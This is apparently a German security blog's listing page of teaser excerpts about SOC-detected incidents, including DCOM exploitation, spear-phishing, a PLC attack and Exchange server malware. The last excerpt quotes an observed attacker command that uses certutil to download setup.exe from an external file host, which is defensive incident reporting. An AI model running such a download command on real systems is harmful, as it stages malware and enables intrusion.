Angriff auf DCOM-Schwachstelle in Windows-basiertem OT-System erfolgreich abgewehrt

Vor kurzem meldete unser SOC einen Angriff auf ein OT-System bei einem unserer Kunden, welchen wir Dank der frühzeitigen Detektion erfolgreich abwehren konnten. Der Angreifer nutzte dabei eine Schwachstelle in der DCOM-Kommunikation des Windows-basierten OT-Systems (CVE-2021-26414), um eine Remote-Code-Ausführung zu ermöglichen, das System zu kompromittieren und so auf sensible Daten

Weiterlesen »
2. Mai 2023

Alarmierende Zahlen: Veraltete Betriebssysteme in 65 Prozent aller Produktionsumgebungen

Laut einer kürzlich veröffentlichten Studie, welche das Security-Unternehmen Trend Micro in Auftrag gegeben hat, kommen in 65 Prozent der Produktionsumgebungen veraltete Betriebssysteme zum Einsatz – in Anbetracht des erheblichen Sicherheitsrisikos veralteter Systeme eine alarmierende Zahl. Doch warum werden veraltete Betriebssysteme überhaupt noch eingesetzt? In einigen Produktionsumgebungen machen beispielsweise Kompatibilitätsprobleme mit

Weiterlesen »
26. April 2023

Sicherheitsvorfall im Bereich OT bei deutschem Hersteller erfolgreich abgewehrt

Bei einem unserer jüngsten Kundenfälle wurde ein führender deutscher Hersteller Opfer einer Spear-Phishing-Kampagne im Bereich der Operational Technology (OT). Dabei gab sich der Angreifer als Lieferant des Unternehmens aus und verschickte eine legitime E-Mail mit bösartigem Anhang. Beim Öffnen des Anhangs führte sich ein Skript selbständig aus, welches dem Angreifer

Weiterlesen »
20. April 2023

OT-Security Hack: Schwachstelle in Industrie-Steuerungscomputer (PLC) führt zu Cyberangriff

In einem unserer jüngsten Kundenfälle wurden die OT-Systeme eines deutschen Unternehmens von Hackern angegriffen und kompromittiert. Die Angreifer nutzten dafür eine Schwachstelle in einem industriellen Steuerungscomputer (PLC) aus, um Zugriff auf die OT-Systeme zu erlangen und diese zu manipulieren. Wir reagierten schnell und instruierten den Kunden, sofort seine Incident-Response-Pläne zu

Weiterlesen »
12. April 2023

Sicherheitsvorfall: Schadcode und Datenabfluss auf Kunden-Exchange

Auf dem Exchange-Server eines Kunden haben wir mehrere ungewöhnliche Aktivitäten festgestellt. Dort wurden schädliche Downloads beobachtet und Endpoint Protection Warnungen von „Symantec Network Protection“ ausgelöst. Auch Veränderungen am System, wie die Installation von schädlicher Software mit dem Pfad „C:\setup.exe“ waren ein Resultat unserer Analyse. Doch wie ist es zu diesem

Weiterlesen »
28. März 2023

Alarmstufe Rot: Bedrohung durch Malware auf Exchange-Server entdeckt

Die SOC-Experten unserer Leitstelle haben kürzlich folgenden bedrohlichen Vorfall bei einem Kunden entdeckt. Über die Regel „Suspicious Certutil Command“ wurden sie auf den verdächtigen Befehl „C:\Windows\system32\cmd.exe /c certutil.exe -urlcache -f https://temp.sh/OkXnS/setup.exe C:\programdata\setup.exe >> C:\Windows\TEMP\tmpE338.tmp 2>&1” aufmerksam, der auf einem Exchange-Server ausgeführt wurde. Der ausgeführte Befehl enthält den Parameter „-urlcache“, gefolgt

Weiterlesen »
23. März 2023